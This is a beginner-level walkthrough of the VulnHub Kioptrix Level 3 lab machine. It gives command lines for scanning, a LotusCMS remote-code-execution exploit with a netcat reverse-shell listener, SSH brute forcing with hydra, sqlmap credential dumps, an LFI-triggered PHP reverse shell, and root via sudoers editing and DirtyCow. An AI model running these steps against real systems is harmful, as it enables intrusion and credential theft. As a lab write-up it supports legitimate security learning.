Kioptrix Series
VulnHub - Kioptrix: Level 3 (1.2) (#3)
Learn the basic tools and techniques used in vulnerability assessment and exploitation in a gamified manner

Cover Image by vector_corp on Freepik
As with the other two, this challenge is geared toward the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one’s skill level. I never said these things were exceptionally hard, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
The important thing with this challenge. Once you find the IP (DHCP Client) edit your host’s file and point it to There’s a web application involved, so to have everything nice and properly displayed you need to do this.
Information Gathering
Finding Target
Once the Kioptrix VM is up and running its IP address has to be found.

# Network Gateway Details
ip r
# Display IP Address
ip a l eth0
The IP address can be obtained by performing a network scan.

The VMs are connected to the
subnet. Using netdiscover
all the machines on the network can be found.
# Scan Subnet for devices
sudo netdiscover -P -r

Since there is no other device on the network
has to be the IP address of the Kioptrix VM.
IP addresses belong to the virtual router of the network. The.2
address can be used to connect to the host machine. The.3
address is the DHCP server of the network.
As mentioned in the description of the VM. The IP address of the Kioptrix VM should be mapped to a domain name.
cat /etc/hosts
# Add below line in Hosts file

Port Scanning
By running a port scan the services running on the target can be found.
sudo rustscan -a --ulimit 5000 -- -sS -A -T4 -oN rustscan.txt

There are two ports open: 22 and 80

Port 22 has SSH running. It is using OpenSSH 4.7p1
Port 80 is used by the Apache web server. The system has Apache 2.2.8
installed. The target OS is Ubuntu. The web application utilizes PHP 5.2.4 and the OS is using kernel 2.6.x
Web App Enumeration
# Nikto Scan
nikto -h -o nikto.txt

scan shows that the web application has an /phpmyadmin
directory which implies the application uses a MySQL database.
# Feroxbuster Scan
feroxbuster -u -x php,html -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -d 2 -f -C 404 --no-state -o feroxbuster.txt

The directory scan also found the /phpmyadmin
directory. Additionally, the directories /modules
, /cache
and /gallery
were found.
Gaining Access

The /modules
directory contains some .php
files but they don't look important. The /gallery
route opens an image gallery.

The site does not contain the robots.txt
and sitemap.xml
Approach 1: Lotus CMS Exploit
On the Login page, we find that the Ligoat Security site is using Lotus CMS.

From a quick search, we can find that this CMS system has a known remote command execution (RCE) vulnerability.
searchsploit lotusCMS

The RCE exploit is present in Metasploit but I decided to take a more manual approach.

# Netcat Listener
nc -nvlp 9001
git clone
cd LotusCMS-Exploit
./ /

The script checks if the target is vulnerable and then asks for the IP address of the attack machine along with a port. Before selecting the type of listener to use ensure to start netcat
in a separate terminal listening on the port provided in the script.

The exploit puts us at the root of the website source code. Using find
I checked if any config files are present.
# Find Files in current directory
find . -type f -iname *config*
# View file content
cat ./gallery/gconfig.php

The gconfig.php
file contains the username and password for connecting to the MySQL database. From the enumeration that was performed, we know that the target has the /phpmyadmin
page enabled.
Username: root
Password: fuckeyou

The dev_accounts
table contains the hashed passwords for user dreg
and loneferret

The gallarific_users
table contains the password for the user admin
I ran one of the hashes against hash-identifier
to find its type.
hash-identifier 0d3eccfb887aabd50f243b3f155c0f85

Using CrackStation
the value of the hashes was found. Using SSH access to the target system should now be possible.
# SSH Command
ssh loneferret@ -oHostKeyAlgorithms=+ssh-rsa

The target system uses an old version of SSH which uses encryption and key exchange algorithms that are no longer supported by default. To allow SSH to connect using these older protocols the-o
flag is used.
Approach 2: SSH Brute force

On the blog tab of the website, there are two posts. The first one discusses the release of an online gallery which is the site on the /gallery
route. The second post talks about the hiring of a new programmer. The developer goes by the name loneferret
The target has SSH running, I tried to brute force the password of loneferret
# Password Brute force Attack
hydra -l loneferret -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords.txt -t 4 ssh

And it worked. The password of user loneferret
is starwars
The-t 4
argument is important. Hydra brute forcing for SSH does not work without it.On new versions of Kali running Hydra against old versions of SSH does not work. To fix the issue the wide compatibility mode for SSH has to be enabled. This is done using the Kali Tweaks utility.
Kali Tweaks > Hardening > SSH client
After using
remember to disable the wide compatibility mode for SSH as it lowers the security of Kali.
# SSH Command
ssh loneferret@ -oHostKeyAlgorithms=+ssh-rsa

The target system uses an old version of SSH which uses encryption and key exchange algorithms that are no longer supported by default. To allow SSH to connect using these older protocols the-o
flag is used.
Approach 3: SQL Injection
On the gallery portal on the Ligoat Press Room page, there is an option to sort the images based on different parameters.

On using the sort option the URI of the page changes to include the sorting option selected as a query parameter.

I tested this parameter for SQL injection vulnerability and it was indeed vulnerable.
# Test URL for SQL Injection vulnerability
sqlmap -u "" --level 5 --risk 3 -p id,sort --dbms=mysql --output-dir=sqlmap

# Dump database names
sqlmap -u "" --level 5 --risk 3 -p id,sort --dbs --output-dir=sqlmap

# Dump table names
sqlmap -u "" --level 5 --risk 3 -p id,sort -D gallery --tables --output-dir=sqlmap

# Dump 'dev_accounts' table content
sqlmap -u "" --level 5 --risk 3 -p id,sort -D gallery -T dev_accounts --dump --output-dir=sqlmap

The dev_accounts
table contains the password hashes of dreg
and loneferret
. Using sqlmap
build-in wordlist the passwords were cracked. The values as Mast3r
and starwars
# Dump 'gallarific_users' table content
sqlmap -u "" --level 5 --risk 3 -p id,sort -D gallery -T gallarific_users --dump --output-dir=sqlmap

The gallarific_users
table contains the password of an admin user in plain text.
Using SSH access to the target system should now be possible.
# SSH Command
ssh loneferret@ -oHostKeyAlgorithms=+ssh-rsa

The target system uses an old version of SSH which uses encryption and key exchange algorithms that are no longer supported by default. To allow SSH to connect using these older protocols using the-o
flag is used.
Bonus Approach: LFI + Reverse Shell
The site uses query parameters to decide the content to be rendered. Sites that use query parameters that are not properly sanitized can be vulnerable to LFI (Local File Inclusion).

The query parameter system
that is used on the Blog and Login page is vulnerable to LFI and using it the content of the /etc/passwd
can be dumped. The two users that have accounts on the system are loneferret
and dreg

The source code of the gallery portal reveals an additional route /gadmin
which might still be accessible. This route leads to an admin login page.

To continue ahead with this approach we need the content of the gallarific_users
table from the database. Approach 1 and Approach 3 can be used to get the details.
Username: admin
Password: n0t7t1k4

On login, a dashboard is visible that can be used to add/delete/modify the images that are posted onto the gallery. From the Upload tab under Photos, I tried to upload a PHP reverse shell.

I uploading a .php
file and the upload seemed to be successful.

On trying to open the uploaded file I got a “File not Found” error which means that even though an entry was added to the database the file was not uploaded.

I changed the extension of the script to .jpg
and reuploaded it. This time on opening the file I received a different message.

Now it looks like the file was indeed uploaded but since it is not an actual image the browser could not render the file.
Set up a listener using netcat
and using the LFI vulnerability that was found on the system
query parameter execute the script.
# Listener
nc -nvlp 9002
# URL with LFI

Privilege Escalation
For proceeding with the steps for gaining root access login into the system as the user loneferret
or dreg
Approach 1: HT Editor
ls -lah
cat CompanyPolicy.README

In the home directory for loneferret
there are two file
which seems to be a script to check the security of files. Additionally, there is a CompanyPolicy.README
which instructs the users to use ht
editor for working with files. The file instructs to invoke ht
with the sudo
# View user sudo permissions
sudo -l

The sudoers file shows that loneferret
can run the ht
command as root without a password. By using sudo
the ht
editor will get launched as the root user this should allow you to modify system files without the root password.
sudo ht
export TERM=xterm
sudo ht

Using F3 we can select the file to open in the editor.

Alternatively, by removing the ! from before the first command loneferret
will be able to run the su
command without a password which will also grant root access. Another approach would be to remove everything after the :
and replace it with ALL
. This would allow loneferret
to run all commands as root without a password.
Use F2 to save the file and Ctrl + Z to exit the application.
sudo /bin/bash

editor also has a Buffer Overflow exploit. But the exploit script is written in an older version of Perl. The script needs to be updated to make it work on the target.
Approach 2: Kernel Exploit
The enumeration that was performed in the information-gathering stage discovered that the target is running kernel v2.6.x.
uname -a
cat /proc/version_signature

By a quick search, it can be found that this version of the Linux kernel is vulnerable to the DirtyCow
By setting up a web server the exploit can be downloaded onto the target. The steps to execute the exploit are provided in the code itself. On running the exploit a password for a new user (firefart
) has to be provided. This user will have root
privileges i.e. full access to the system.
# Attach Machine (Web server)
python -m http.server 9001
# Target Machine
gcc -pthread dirtycow.c -o dirtycow -lcrypt
./dirtycow password
su firefart

ls -lah /root/
cat /root/Congrats.txt

Overall this level was quite challenging compared to the previous levels. But it was a fun exercise that presented multiple varied approaches for compromising a system.
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